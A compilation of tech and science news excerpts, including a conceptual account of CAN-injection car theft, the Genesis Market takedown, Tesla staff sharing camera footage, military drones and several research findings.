A Cornell University researcher has developed sonar glasses that “hear” you without speaking. The eyeglass attachment uses tiny microphones and speakers to read the words you mouth as you silently command it to pause or skip a music track, enter a passcode without touching your phone or work on CAD models without a keyboard.
Cornell Ph.D. student Ruidong Zhang developed the system, which builds off a similar project the team created using a wireless earbud — and models before that which relied on cameras. The glasses form factor removes the need to face a camera or put something in your ear. “Most technology in silent-speech recognition is limited to a select set of predetermined commands and requires the user to face or wear a camera, which is neither practical nor feasible,” said Cheng Zhang, Cornell assistant professor of information science. “We’re moving sonar onto the body.”
The researchers say the system only requires a few minutes of training data (for example, reading a series of numbers) to learn a user’s speech patterns. Then, once it’s ready to work, it sends and receives sound waves across your face, sensing mouth movements while using a deep learning algorithm to analyze echo profiles in real time “with about 95 percent accuracy.”
The system does this while offloading data processing (wirelessly) to your smartphone, allowing the accessory to remain small and unobtrusive. The current version offers around 10 hours of battery life for acoustic sensing. Additionally, no data leaves your phone, eliminating privacy concerns. “We’re very excited about this system because it really pushes the field forward on performance and privacy,” said Cheng Zhang. “It’s small, low-power and privacy-sensitive, which are all important features for deploying new, wearable technologies in the real world.”
Shadetree hackers—or, as they’re more commonly called, tech-savvy thieves—have found a new way to steal cars. No, it’s not a relay attack, Bluetooth exploit, key fob replay, or even a USB cable. Instead, these thieves are performing a modern take on hot-wiring without ever ripping apart the steering column.
Crafty criminals have resorted to using specially crafted devices that simply plug into the wiring harness behind the headlight of a victim’s car. Once they’re plugged in, they’re able to unlock, start, and drive away before the owner even catches wind of what’s going on.
Last year, Ian Tabor, who runs the UK chapter of Car Hacking Village, had his Toyota RAV4 stolen from outside of his home near London. Days prior to the theft, he found that thieves had damaged his car without successfully taking it. It wasn’t quite clear if it was a case of vandalism, or if the thieves had tried to make off with the car’s front bumper, but he did notice that the headlight harness had been yanked out.
Ultimately, his car wound up missing when thieves successfully made away with it. And after Tabor’s car was stolen, so was his neighbor’s Toyota Land Cruiser. But, folks, this is 2023. It’s not like you can just hotwire a car and drive away as the movies suggest. This got Tabor curious—after all, hacking cars is something he does for fun. How exactly did the thieves make off with his car?
Tabor got to work with Toyota’s “MyT” app. This is Toyota’s telematics system which pumps Diagnostic Trouble Codes up to the automaker’s servers rather than forcing you to plug in a code reader to the car’s OBD2 port. Upon investigation, Tabor noticed that his Rav4 kicked off a ton of DTCs just prior to being stolen—one of which was for the computer that controls the car’s exterior lighting.
This led Tabor to wonder if the thieves somehow made use of the vehicle CAN Bus network to drive away with his car. After scouring the dark web, Tabor was able to locate expensive tools claiming to work for various automakers and models, including BMW, Cadillac, Chrysler, Fiat, Ford, GMC, Honda, Jeep, Jaguar, Lexus, Maserati, Nissan, Toyota, as well as Volkswagen. The cost? As much as $5,400, but that’s a drop in the bucket if they can actually deliver on the promise of enabling vehicle theft.
Tabor decided to order one of these devices to try out himself. Together with Ken Tindell, the CTO of Canis Automotive Labs, the duo tore down a device to find out what made it tick and publish a writeup of their findings.
As it turns out, the expensive device was comprised of just $10 in components. The real magic is in the programming, which was set up to inject fake CAN messages into the car’s actual CAN Bus network. The messages essentially tricked the car into thinking a trusted key was present, which convinced the CAN Gateway (the component that filters out CAN messages into their appropriate segmented networks) into passing along messages instructing the car to disable its immobilizer, unlocking the doors, and essentially allowed the thieves to just away.
What’s more, is that the device simply looked like an ordinary portable speaker. The guts were stuffed inside the shell of a JBL-branded Bluetooth speaker, and all the thief needs to do is simply power the device on.
Once the device is on and plugged in, it wakes up the CAN network by sending a frame—similar to if you were to pull on a door handle, approach with a passive entry key, or hit a button on your fob. It then listens for a specific CAN message to begin its attack. The device then emulates a hardware error which tricks other ECUs on the CAN network to stop sending messages so that the attacking device has priority to send its spoofed messages to CAN devices.
The pause of valid messages is when the device is able to go into attack mode. It then sends the spoofed “valid key present” messages to the gateway which makes the car think that an actual valid key is being used to control the vehicle. Next, the attacker simply presses the speaker’s “play” button, and the car’s doors are unlocked.
Given that the manufacturer of these CAN injection devices claims that the devices are so effective against a myriad of makes and models, it would seem that this could be an industry-wide problem that may take some brainstorming to fix.
The good news is that this type of attack can be thwarted. While there are quick-and-dirty methods that could potentially be re-defeated in the long run, an automaker looking to prevent this type of attack by encrypting its CAN Bus network. According to Tindell, Canis is working on a similar project to retrofit U.S. military vehicles with a similar encryption scheme, similar to what he suggests as the fix for commercial vehicles experiencing this issue.
Several law enforcement agencies have teamed up to take down Genesis Market, a website selling access to “over 80 million account access credentials,” which included the standard usernames and passwords, as well as much more dangerous data like session tokens. According to a press release from the US Department of Justice, the site was seized on Tuesday. The European Union Agency for Law Enforcement Cooperation (or Europol) says that 119 of the site’s users have been arrested.
Genesis Marketplace has been around since 2018, according to the Department of Justice, and was “one of the most prolific initial access brokers (IABs) in the cybercrime world.” It let hackers search for certain types of credentials, such as ones for social media accounts, bank accounts, etc., as well as search for credentials based on where in the world they came from.
The agencies have teamed up with HaveIBeenPwned.com to make it easy for the public to check if their login credentials were stolen, and I’d highly recommend doing so — because of the way Genesis worked, this isn’t the typical “just change your password and you’ll be fine scenario.” For instructions on how to check whether Genesis was selling your stolen info, check out the writeup from Troy Hunt, who runs HaveIBeenPwned.
(The TL;DR is that you should sign up for HIBP’s email notification service with all of your important email addresses, and then be sure to click the “Verify email” button in the confirmation email. Just searching for your email on the site won’t tell you if you were impacted.)
[…]
While Genesis Marketplace traded in usernames and passwords, it also sold access to users’ cookies and browser fingerprints as well, which could let hackers bypass protections like two-factor authentication. Cookies — or login tokens, to be specific — are files that websites store on your computer to show that you’ve already logged in by correctly entering your password and two-factor authentication information. They’re the reason you don’t have to log into a website each time you visit it. (They’re also the reason that the joint effort to take down Genesis was given the delightful codename “Operation Cookie Monster.”)
[…]
Genesis stole the fingerprints, too. What’s more, it even provided a browser extension that let hackers spoof the victim’s fingerprint while using their login cookie to gain access to an account, according to a 2019 report from ZDNET.
A unit of the Russian military intelligence service GROe has hacked routers of Dutch private individuals and small and medium-sized companies. The Military Intelligence Service (MIVD) has discovered this, writes de Volkskrant.
The routers are part of a worldwide attack network and can, for example, destroy or paralyze the network of ministries. It is estimated that there are thousands of hacked devices in the hands of the Russian unit worldwide. In the Netherlands, this would involve several dozen routers.
The hacked devices are more advanced routers of computers often located at small businesses. The Russian unit will take over the routers and can monitor and control them, investigative journalist Huib Modderkolk told NOS Radio 1 Journaal.
According to him, this unit was created to sabotage: “It is also called the most dangerous hacking group in the world.” ‘We know what you’re doing’
The MIVD discovered the digital attack because the service saw many Dutch IP addresses. According to Modderkolk, the victims often do not realize that they have been hacked. By accepting the router’s default settings or using a simple password, these routers are easy to hack. Individuals and companies have now been informed by the MIVD.
It is striking that the MIVD makes this information public: “They hope for more awareness that this is actually going on, but the aim is also to let the Russians know: ‘we know what you are doing'”. According to Modderkolk, this is a development of recent years, and the British and Americans are also increasingly disclosing this type of sensitive information. Disinformation and cyber threats
The National Coordinator for Counterterrorism and Security (NCTV) has already warned of disinformation and cyber threats in connection with the war in Ukraine. These cyber attacks could affect the communication system of banks or hospitals, among others. At the moment there are no specific threats, but due to the rapid developments of the war, this could change quickly.
It is not clear whether the hack of the Russian hacker group has to do with the war in Ukraine.
Human memory might be even more unreliable than currently thought. In a new study, scientists found that it’s possible for people to form false memories of an event within seconds of it occurring. This almost-immediate misremembering seems to be shaped by our expectations of what should happen, the team says.
[…]
they recruited hundreds of volunteers over a series of four experiments to complete a task: They would look at certain letters and then be asked to recall one highlighted letter right after. However, the scientists used letters that were sometimes reversed in orientation, so the volunteers had to remember whether their selection was mirrored or not (for example, correctly identifying whether they saw c vs ↄ). They also focused on the volunteers who were highly confident about their choices during the task.
Overall, the participants regularly misremembered the letters, but in a specific way. People were generally good at remembering when a typical letter was shown, with their inaccuracy rates hovering around 10%. But they were substantially worse at remembering a mirrored letter, with inaccuracy rates up to 40% in some experiments. And, interestingly enough, their memory got worse the longer they had to wait before recalling it. When they were asked to recall what they saw a half second later, for instance, they were wrong less than 20% of the time, but when they were asked three seconds later, the rate rose as high as 30%.
According to Otten, the findings—published Wednesday in PLOS One—indicate that our memory starts being shaped almost immediately by our preconceptions. People expect to see a regular letter, and don’t get easily fooled into misremembering a mirrored letter. But when the unexpected happens, we might often still default to our missed prediction. This bias doesn’t seem to kick in instantaneously, though, since people’s short-term memory was better when they had to be especially quick on their feet.
“It is only when memory becomes less reliable through the passage of a tiny bit of time, or the addition of extra visual information, that internal expectations about the world start playing a role,” Otten said.
Some users of Microsoft’s free Outlook hosted service are finding they can no longer send or receive emails because of how the Windows giant now calculates the storage of attachments.
Microsoft account holders are allowed to hold up to 15GB in their cloud-hosted email, which until recently included text and attachments, and 5GB in their OneDrive storage. That policy changed February 1. Since then, attachments now count as part of the 5GB OneDrive allowance – and if that amount is exceeded, it throws a wrench into the email service.
It doesn’t change the storage amount available in Outlook.com, but could in OneDrive.
“This update may reduce how much cloud storage you have available to use with your OneDrive,” Microsoft wrote in a support note posted before the change. “If you reach your cloud storage quota, your ability to send and receive emails in Outlook.com will be disrupted.”
Redmond added that the plan was to gradually roll out the cloud storage changes and new quota bar starting February 1 across users’ app and Windows settings and Microsoft accounts. Two months later, that gradual rollout is beginning to hit more and more users.
One reader told The Register that his Outlook recently stopped working and indicated that he had surpassed the 5GB storage limit, reaching 6.1GB. He was unaware of the policy change, so he was confused when he saw that in his email account he had used only 6.8GB of the 15GB allowed.
It was the change in how attachments are added that tripped him up. Microsoft told him about the new policy.
No one deletes attachments every time an email is received. This is like blackmail “So instantly, I have lost 10GB of email capacity and because my attachments were greater than 5GB that instantly disabled my email and triggered bounce-backs (even sending and receiving with no attachments),” the reader told us.
“No one deletes attachments every time an email is received. This is like blackmail. MS is forcing us to buy a subscription by the back door or to have to delete emails with attachments on a regular basis ad infinitum.”
He isn’t the only one perplexed by the issue.
[…]
One who apparently was unaware that it was the attachments shifting over to OneDrive causing the email problems deleted a lot of emails, only to find it didn’t change the “storage used” amount.
“We could see inside people’s garages and their private properties,” a former employee told Reuters. “Let’s say that a Tesla customer had something in their garage that was distinctive, you know, people would post those kinds of things.”
One office in particular, located in San Mateo, reportedly had a “free-wheeling” atmosphere, where employees would share videos and images with wild abandon. These pics or vids would often be “marked-up” via Adobe photoshop, former employees said, converting drivers’ personal experiences into memes that would circulate throughout the office.
“The people who buy the car, I don’t think they know that their privacy is, like, not respected,” one former employee was quoted as saying. “We could see them doing laundry and really intimate things. We could see their kids.”
Another former employee seemed to admit that all of this was very uncool: “It was a breach of privacy, to be honest. And I always joked that I would never buy a Tesla after seeing how they treated some of these people,” the employee told the news outlet. Yes, it’s always a vote of confidence when a company’s own employees won’t use the products that they sell.
Privacy concerns related to Tesla’s data-guzzling autos aren’t exactly new. Back in 2021, the Chinese government formally banned the vehicles on the premises of certain military installations, calling the company a “national security” threat. The Chinese were worried that the cars’ sensors and cameras could be used to funnel data out of China and back to the U.S. for the purposes of espionage. Beijing seems to have been on to something—although it might be the case that the spying threat comes less from America’s spooks than it does from bored slackers back at Tesla HQ.
One of the reasons that Tesla’s cameras seem so creepy is that you can never really tell if they’re on or not. A couple of years ago, a stationary Tesla helped catch a suspect in a Massachusetts hate crime, when its security system captured images of the man slashing tires in the parking lot of a predominantly Black church. The man was later arrested on the basis of the photos.
Reuters notes that it wasn’t ultimately “able to determine if the practice of sharing recordings, which occurred within some parts of Tesla as recently as last year, continues today or how widespread it was.”
With all this in mind, you might as well always assume that your Tesla is watching, right? And, now that Reuters’ story has come out, you should also probably assume that some bored coder is also watching—potentially in the hopes of converting your dopiest in-car moment into a meme.
Private camera recordings, captured by cars, were shared in chat rooms: ex-workers Circulated clips included one of child being hit by car: ex-employees Tesla says recordings made by vehicle cameras ‘remain anonymous’ One video showed submersible vehicle from James Bond film, owned by Elon Musk
LONDON/SAN FRANCISCO, April 6 (Reuters) – Tesla Inc assures its millions of electric car owners that their privacy “is and will always be enormously important to us.” The cameras it builds into vehicles to assist driving, it notes on its website, are “designed from the ground up to protect your privacy.”
But between 2019 and 2022, groups of Tesla employees privately shared via an internal messaging system sometimes highly invasive videos and images recorded by customers’ car cameras, according to interviews by Reuters with nine former employees.
Some of the recordings caught Tesla customers in embarrassing situations. One ex-employee described a video of a man approaching a vehicle completely naked.
Also shared: crashes and road-rage incidents. One crash video in 2021 showed a Tesla driving at high speed in a residential area hitting a child riding a bike, according to another ex-employee. The child flew in one direction, the bike in another. The video spread around a Tesla office in San Mateo, California, via private one-on-one chats, “like wildfire,” the ex-employee said.
Other images were more mundane, such as pictures of dogs and funny road signs that employees made into memes by embellishing them with amusing captions or commentary, before posting them in private group chats. While some postings were only shared between two employees, others could be seen by scores of them, according to several ex-employees.
Tesla states in its online “Customer Privacy Notice” that its “camera recordings remain anonymous and are not linked to you or your vehicle.” But seven former employees told Reuters the computer program they used at work could show the location of recordings – which potentially could reveal where a Tesla owner lived.
One ex-employee also said that some recordings appeared to have been made when cars were parked and turned off. Several years ago, Tesla would receive video recordings from its vehicles even when they were off, if owners gave consent. It has since stopped doing so.
“We could see inside people’s garages and their private properties,” said another former employee. “Let’s say that a Tesla customer had something in their garage that was distinctive, you know, people would post those kinds of things.”
Tesla didn’t respond to detailed questions sent to the company for this report.
About three years ago, some employees stumbled upon and shared a video of a unique submersible vehicle parked inside a garage, according to two people who viewed it. Nicknamed “Wet Nellie,” the white Lotus Esprit sub had been featured in the 1977 James Bond film, “The Spy Who Loved Me.”
The vehicle’s owner: Tesla Chief Executive Elon Musk, who had bought it for about $968,000 at an auction in 2013. It is not clear whether Musk was aware of the video or that it had been shared.
To report this story, Reuters contacted more than 300 former Tesla employees who had worked at the company over the past nine years and were involved in developing its self-driving system. More than a dozen agreed to answer questions, all speaking on condition of anonymity.
Reuters wasn’t able to obtain any of the shared videos or images, which ex-employees said they hadn’t kept. The news agency also wasn’t able to determine if the practice of sharing recordings, which occurred within some parts of Tesla as recently as last year, continues today or how widespread it was. Some former employees contacted said the only sharing they observed was for legitimate work purposes, such as seeking assistance from colleagues or supervisors.
In a future fight, control of advanced drones belonging to the U.S. Navy and U.S. Air Force could be passed back and forth between assets from either service as the situation demands. Uncrewed platforms are set to make up the majority of the Navy’s future carrier air wings, with up to 60 percent of all aircraft on each flattop eventually being pilotless.
Navy Rear Adm. Andrew “Bucket” Loiselle provided details on the service’s advanced aviation plans, including new drones and sixth-generation crewed stealth combat jets, and cooperation with the Air Force on these efforts during a panel discussion yesterday at the Navy League’s annual Sea-Air-Space conference and exhibition. These efforts are part of the service’s broader Next Generation Air Dominance (NGAD) program that you can learn about here. Loiselle is currently the director of the Air Warfare Division, also referred to as N98, within the Office of the Chief of Naval Operations.
[…]
n a future fight, control of advanced drones belonging to the U.S. Navy and U.S. Air Force could be passed back and forth between assets from either service as the situation demands. Uncrewed platforms are set to make up the majority of the Navy’s future carrier air wings, with up to 60 percent of all aircraft on each flattop eventually being pilotless.
Navy Rear Adm. Andrew “Bucket” Loiselle provided details on the service’s advanced aviation plans, including new drones and sixth-generation crewed stealth combat jets, and cooperation with the Air Force on these efforts during a panel discussion yesterday at the Navy League’s annual Sea-Air-Space conference and exhibition. These efforts are part of the service’s broader Next Generation Air Dominance (NGAD) program that you can learn about here. Loiselle is currently the director of the Air Warfare Division, also referred to as N98, within the Office of the Chief of Naval Operations.
In a future fight, control of advanced drones belonging to the U.S. Navy and U.S. Air Force could be passed back and forth between assets from either service as the situation demands. Uncrewed platforms are set to make up the majority of the Navy’s future carrier air wings, with up to 60 percent of all aircraft on each flattop eventually being pilotless.
Navy Rear Adm. Andrew “Bucket” Loiselle provided details on the service’s advanced aviation plans, including new drones and sixth-generation crewed stealth combat jets, and cooperation with the Air Force on these efforts during a panel discussion yesterday at the Navy League’s annual Sea-Air-Space conference and exhibition. These efforts are part of the service’s broader Next Generation Air Dominance (NGAD) program that you can learn about here. Loiselle is currently the director of the Air Warfare Division, also referred to as N98, within the Office of the Chief of Naval Operations.
null
null
“As we looked upon that air wing of the future, we have numerous unmanned systems,” Loiselle said. “You’ve heard talk about CCAs [and] MQ-25.”
CCA stands for Collaborative Combat Aircraft and is a term that originated with the Air Force to describe future advanced drones with high degrees of autonomy intended to operate collaboratively with crewed platforms. Secretary of the Air Force Frank Kendall announced earlier this year that the service had begun doing future planning around a fleet of at least 1,000 CCAs, as well as 200 crewed sixth-generation stealth combat jets, all being developed as part of its own separate multi-faceted NGAD program. The CCA figure was based on a notional concept of operations that would pair two of the drones with each of the 200 NGAD combat jets and 300 stealthy F-35A Joint Strike Fighters.
However, the Air Force is still very much refining its CCA fleet structure plans, which could grow to include an even larger total number of CCAs with different types geared toward different mission sets. It’s also still figuring out how it intends to deploy and employ them. The Navy appears to be doing much the same, in increasingly close coordination with the Air Force.
“We’re developing an unmanned control station that’s already installed on three aircraft carriers, and that will be the control station for any UAS [uncrewed aerial systems] that we buy,” Rear Adm. Loiselle added. “[There is] unbelievable cooperation with the Air Force right now in the development of mission systems for both sixth-gen [combat jets] and CCAs… I’m very close to getting a signed agreement with the Air Force where we’re going to have the ability for the Navy to control Air Force CCAs and the Air Force to control Navy CCAs.”
The Navy has previously said that the MQ-25 would be deployed first on the Nimitz class carriers USS Dwight D. Eisenhower and USS George H.W. Bush, and the latter ship has been actively used for testing that drone. It was announced last year that the plans had changed and that USS Theodore Roosevelt, another Nimitz class ship, would be the first to host the Stingray.
The expectation is that future CCAs will also be able to be controlled by various aircraft in the course of operations. The Navy has specifically said in the past that one of the core missions for its future sixth-generation crewed combat jet, also referred to as F/A-XX, will be acting as a “quarterback” for drones.
For the Navy and the Air Force, being able to readily exchange control of future drones will be key to ensuring operational flexibility. During the panel discussion yesterday, Rear Adm. Loiselle outlined a broader future naval vision where this capability could be particularly valuable.
[…]
“The bottom line is when we’re building our future force that’s going to be 60 percent unmanned, then we’re going to look different than we do today. And we are no longer going to have a fighting force that has 44 strike fighters on the deck, because that’s incompatible with a 60 percent unmanned air wing,” the rear admiral explained. “So we’re going to have to change the narrative, from 44 strike fighters to how many targets can I get at what range at what time intervals, because that’s the true metric that matters.”
“The type of platform that delivers that ordnance is less important than the ability to do so,” he continued. “So we need to look at the entire portfolio that is present within the carrier strike group and how we generate that effect. Equally, we need to be cognizant of what’s available in the joint force, such that we don’t duplicate capabilities that would work within our part of that plan execution.”
[…]
With all this in mind, carrier strike groups, as well as potentially other naval assets, being able to readily take control of Air Force drones during operations in certain circumstances, and vice versa, could be extremely useful. A Navy carrier air wing or Air Force elements in the same region might be able to provide more on-demand escorts or other support for each other’s crewed platforms, including tactical combat jets and larger aircraft like bombers, tankers, and airlifters. Current and future Air Force assets capable of flying very long distances themselves, such as the forthcoming B-21 Raider stealth bomber, could even take control of Navy uncrewed aircraft using more localized line-of-sight links to help with their immediate missions, too.
null
For instance, long-range Air Force platforms like the B-21 could ‘pick up’ CCAs launched from a carrier operating far forward of any land base. They would then fly their mission into contested airspace with the help of their unmanned wingmen, then return them back to Navy control once they head back out of the high-threat area and towards the carrier’s area of operation. Unmanned tactical aircraft have a significant range advantage over their manned counterparts, which is a factor as well.
Beyond this, just being able to share fleets when in the air between the services opens up huge possibilities and operational synergies.
An Australian engineering company has created a cardboard drone that runs on open source software, standard hardware, and can be assembled and flown with no prior experience.
The Corvo Precision Payload Delivery System (PPDS) costs less than $3,500 apiece, a price made possible by the craft’s use of FOSS and commercial-off-the-shelf hardware.
Michael Partridge, SYPAQ’s general manager for Innovation & Strategic Programs (I&SP), told The Register that Corvo uses ArduPilot autopilot software, unspecified hardware that SYPAQ customizes, and waxed cardboard.
The drone takes around an hour to assemble, we’re told, and its lithium-ion batteries give it a range of up to 100km (62 miles) with a 3kg (6.6lb) payload.
The craft ships in a flat pack complete with tape, glue, and instructions on how to assemble it. A tablet computer is also included so users can tell Corvo where to fly by entering GPS coordinates. A wired connection to upload that flight plan is required, but once Corvo is aloft, it will proceed along its route, at a specified altitude, and land itself at its determined destination.
Partridge declined to discuss details of the tech on board the drones for operational reasons but said SYPAQ has ensured that flight plans are encrypted so that if a Corvo is captured, the location of its pilots can’t be retrieved.
SYPAQ will happily ship a single Corvo, but also offers a “capability pack” that includes multiple craft, spares, and the slingshot-powered launch ramp the craft needs to get airborne.
Partridge said single Corvo units have survived more than 20 flights and that the waxed cardboard wing can handle moisture well, without losing its aerodynamic qualities.
Users in the Ukrainian armed forces have adapted the craft to different roles too. Partridge said adding a camera requires some light hacking – of the drone’s cardboard airframe.
“It has a cargo bay [and] you can do whatever you want in there within the 3kg payload. You can cut a hole through the aircraft to look through it and insert a camera.”
For now, SYPAQ hasn’t given Corvo’s onboard computer wireless capabilities, partly to reduce cost and partly to ensure stealth. But Partridge said Corvos have carried action cameras like the GoPro and users are happy to retrieve removable media once the plane lands. SYPAQ is working on payloads that allow wireless transmission of images, possibly over long distances.
[…] The behavior of the 248 Siberian tigers observed through a personality test showed that the endangered cats had unique traits influencing both their success in reproduction and survival, researchers reported in the journal Royal Society Open Science.
“We found that tigers are very individual, and that people who’ve worked with them and know them well see their individual personalities,” co-author Rosalind Arden of the London School of Economics told AFP.
The study adapted a commonly used human personality test to explore tiger traits such as confidence, sincerity, bullying and savagery in two separate populations of tigers held in semi-captivity in China.
Questionnaires with a list of 70 personality indicators were filled out by veterinarians and feeders who work with the tigers on a daily basis.
The combined results found that both tiger populations displayed characteristics that fell into two overarching personality categories: majesty and steadiness.
Tigers scoring higher for “majesty” were healthier, preyed more on live animals, and ate and mated more.
They were also “regarded by their human raters as having higher group status among tigers,” the study said.
But being collaborative and gentler had its evolutionary benefits too: “steady” tigers were shown to be gentler, more sincere and more loving.
Such traits may play a role in the unusual length of time—two to three years—that tiger cubs remain with their mothers.
The study found very few sex-related differences in tigers’ personalities, however, and father tigers have also been observed taking part in raising their young.
“It’s pleasant to see that you don’t have to be dominant, fierce, competitive and aggressive in order to succeed as a tiger,” said Arden.
Similar studies illuminating the personality and mental abilities of primates have helped humanize them, Arden said.
“There is evidence that it does, in fact, improve animal welfare and conservation,” she added.
Siberian tigers are endangered due to poaching and habitat loss. Only around 500 remain living in the wild.
More information: Rosalind Arden et al, Majestic tigers: personality structure in the great Amur cat, Royal Society Open Science (2023). DOI: 10.1098/rsos.220957
Osmotic energy is a renewable energy with zero emissions and minimal daily variations. However, the membranes for osmotic energy harvesting must have multiple properties that are thought to be impossible to realize to make this technology viable. Here, we show that cartilage-inspired cation-selective composite membrane assembled from aramid nanofibers and boron nitride nanosheets make it possible by a layer-by-layer assembly technology. The osmotic energy can be harvested by both salt concentration gradient and pressure-driven streaming because of the high mechanical and transport characteristics of the membranes. The combination of high strength, toughness, chemical resilience, rapid ion transport, and structural versatility of aramid-boron nitride composites makes it a promising candidate for osmotic energy harvesting under realistic operational conditions and life-cycle requirements.
Summary
Osmotic energy represents a widespread and reliable source of renewable energy with minimal daily variability. The key technological bottleneck for osmotic electricity is that membranes must combine highly efficient ion rectification and high ionic flux with long-term robustness in seawater. Here, we show that nanocomposite membranes with structural organization inspired by soft biological tissues with high mechanical and transport characteristics can address these problems. The layered membranes engineered with molecular-scale precision from aramid nanofibers and BN nanosheets simultaneously display high stiffness and tensile strength even when exposed to repeated pressure drops and salinity gradients. The total generated power density over large areas exceeded 0.6 W m−2 and was retained for as long as 20 cycles (200 h), demonstrating exceptional robustness. Furthermore, the membranes showed high performance in osmotic energy harvesting in unprecedentedly wide ranges of temperature (0°C–95°C) and pH (2.8–10.8) essential for the economic viability of osmotic energy generators.
The experiment relies on materials that can change their optical properties in fractions of a second, which could be used in new technologies or to explore fundamental questions in physics.
The original double-slit experiment, performed in 1801 by Thomas Young at the Royal Institution, showed that light acts as a wave. Further experiments, however, showed that light actually behaves as both a wave and as particles – revealing its quantum nature.
These experiments had a profound impact on quantum physics, revealing the dual particle and wave nature of not just light, but other ‘particles’ including electrons, neutrons, and whole atoms.
Now, a team led by Imperial College London physicists has performed the experiment using ‘slits’ in time rather than space. They achieved this by firing light through a material that changes its properties in femtoseconds (quadrillionths of a second), only allowing light to pass through at specific times in quick succession.
Lead researcher Professor Riccardo Sapienza, from the Department of Physics at Imperial, said: “Our experiment reveals more about the fundamental nature of light while serving as a stepping-stone to creating the ultimate materials that can minutely control light in both space and time.”
Details of the experiment are published today in Nature Physics.
[…]
The material the team used was a thin film of indium-tin-oxide, which forms most mobile phone screens. The material had its reflectance changed by lasers on ultrafast timescales, creating the ‘slits’ for light. The material responded much quicker than the team expected to the laser control, varying its reflectivity in a few femtoseconds.
The material is a metamaterial – one that is engineered to have properties not found in nature. Such fine control of light is one of the promises of metamaterials, and when coupled with spatial control, could create new technologies and even analogues for studying fundamental physics phenomena like black holes.
Co-author Professor Sir John Pendry said: “The double time slits experiment opens the door to a whole new spectroscopy capable of resolving the temporal structure of a light pulse on the scale of one period of the radiation.”
The team next want to explore the phenomenon in a ‘time crystal’, which is analogous to an atomic crystal, but where the optical properties vary in time.
Co-author Professor Stefan Maier said: “The concept of time crystals has the potential to lead to ultrafast, parallelized optical switches.”
US Immigration and Customs Enforcement agents are using an obscure legal tool to demand data from elementary schools, news organizations, and abortion clinics in ways that, some experts say, may be illegal.
While these administrative subpoenas, known as 1509 custom summonses, are meant to be used only in criminal investigations about illegal imports or unpaid customs duties, WIRED found that the agency has deployed them to seek records that seemingly have little or nothing to do with customs violations, according to legal experts and several recipients of the 1509 summonses.
A WIRED analysis of an Immigration and Customs Enforcement (ICE) subpoena tracking database, obtained through a Freedom of Information Act request, found that agents issued custom summons more than 170,000 times from the beginning of 2016 through mid-August 2022. The primary recipients of 1509s include telecommunications companies, major tech firms, money transfer services, airlines, and even utility companies. But it’s the edge cases that have drawn the most concern among legal experts,
The outlier cases include custom summonses that sought records from a youth soccer league in Texas; surveillance video from a major abortion provider in Illinois; student records from an elementary school in Georgia; health records from a major state university’s student health services; data from three boards of elections or election departments; and data from a Lutheran organization that provides refugees with humanitarian and housing support.
In at least two instances, agents at ICE used the custom summons to pressure news organizations to reveal information about their sources.
All of this is done without judicial oversight.
[…]
The 1509 customs summons is an administrative subpoena explicitly and exclusively meant for use in investigations of illegal imports or unpaid customs duties under a law known as Title 19 US Code 1509. Its goal is to provide agencies like ICE with a way to obtain business records from companies without having to go to a judge for a warrant.
[…]
Without access to the underlying subpoenas ICE issued in each use of a 1509, it’s difficult to know exactly why companies in the database were issued customs summonses. However, nearly everyone we spoke to was concerned about the types of organizations that received these summonses. Our investigation found that ICE issued scores of customs summonses to hospitals and hundreds to elementary schools, high schools, and universities. “It’s disturbing,” Mao says. “I really can’t imagine how a student or a health record could possibly be relevant to a permissible customs investigation under the law.”
To figure out if these summonses were issued for customs investigations, we contacted 30 organizations that received them. Most did not respond, and many who did refused to speak on the record for fear of retaliation.
[…]
In March last year, US senator Ron Wyden, an Oregon Democrat who chairs the Senate Finance Committee, revealed that ICE had been using 1509 customs summonses to obtain millions of money transfer records, which were added to a database that was shared with hundreds of law enforcement agencies across the country. According to the American Civil Liberties Union (ACLU), it was one of the largest government surveillance programs in recent memory.
Immediately after Wyden’s investigation, the number of customs summons issued by ICE fell from 3,683 in March 2022 to 1,650 by the end of August, according to the records WIRED obtained.
Some of the data was mistaken as noise when first collected up to 40 years ago, and researchers failed to recognize its significance until now. “When everything was calibrated, we saw clearly that the spectra are consistent across all the missions,” announced Lotfi Ben-Jaffel, lead author of the new research published in Planetary Science Journal on Thursday, and a researcher at the Institute of Astrophysics in Paris and the Lunar & Planetary Laboratory, University of Arizona, in a statement.
“This was possible because we have the same reference point, from Hubble, on the rate of transfer of energy from the atmosphere as measured over decades. It was really a surprise for me. I just plotted the different light distribution data together, and then I realized, wow – it’s the same.”
The researchers traced the increased levels of Lyman-alpha UV radiation to Saturn’s atmosphere, and concluded some external process must be exciting the hydrogen atoms. The most plausible explanation is that the icy particles in Saturn’s rings are crashing down onto Saturn’s atmosphere, causing it to heat up.
These bits and pieces get dislodged by colliding with micrometeorites, or by solar wind particle bombardment, solar ultraviolet radiation, or electromagnetic forces picking up electrically charged dust. Once they are knocked out of place, Saturn’s gravity pulls them in.
“Though the slow disintegration of the rings is well known, its influence on the atomic hydrogen of the planet is a surprise,” Ben-Jaffel said. “From the Cassini probe, we already knew about the rings’ influence. However, we knew nothing about the atomic hydrogen content.”
“Everything is driven by ring particles cascading into the atmosphere at specific latitudes. They modify the upper atmosphere, changing the composition. And then you also have collisional processes with atmospheric gases that are probably heating the atmosphere at a specific altitude,” he explained.
The team believe this phenomenon could provide astronomers with a new way to look for ring systems on exoplanets. If a spacecraft detects similar excess UV radiation bands in the upper atmosphere of a faraway planet, it could mean it might be supporting a ring system like Saturn’s.
The Advertising Middlemen Endangering Rigorous Internet Competition Accountability Act, aka the AMERICA Act. Say what you will about government; Congress’ acronym acumen is untouchable. Introduced by Republican Sen. Mike Lee of Utah, the bill would prohibit companies from owning multiple parts of the digital ad ecosystem if they “process more than $20 billion in digital ad transactions.”
The bill would kneecap Google and Meta, the two biggest players in digital advertising by far, but its provisions seem designed to affect almost every big tech company from Apple to Amazon, too. Google, Meta, Amazon, and Apple did not respond to requests for comment.
The only thing longer than the name of the bill is the stunningly bipartisan list of Senators supporting it: Democrats Amy Klobuchar, Richard Blumenthal, and Elizabeth Warren, and Republicans Ted Cruz, Marco Rubio, Eric Schmitt, Josh Hawley, John Kennedy, Lindsey Graham, J.D. Vance, and Lee. As one observer put it on Twitter, it’s a list of cosponsors “who wouldn’t hold the elevator for each other.” Look at all these little Senators getting along. Isn’t that nice?
[…]
“If enacted into law, this bill would most likely require Google and Facebook to divest significant portions of their advertising businesses—business units that account for or facilitate a large portion of their ad revenue,” Sen. Lee said in a fact sheet about the bill. “Amazon may also have to make divestments, and the bill will impact Apple’s accelerating entry into third-party ads.”
[…]
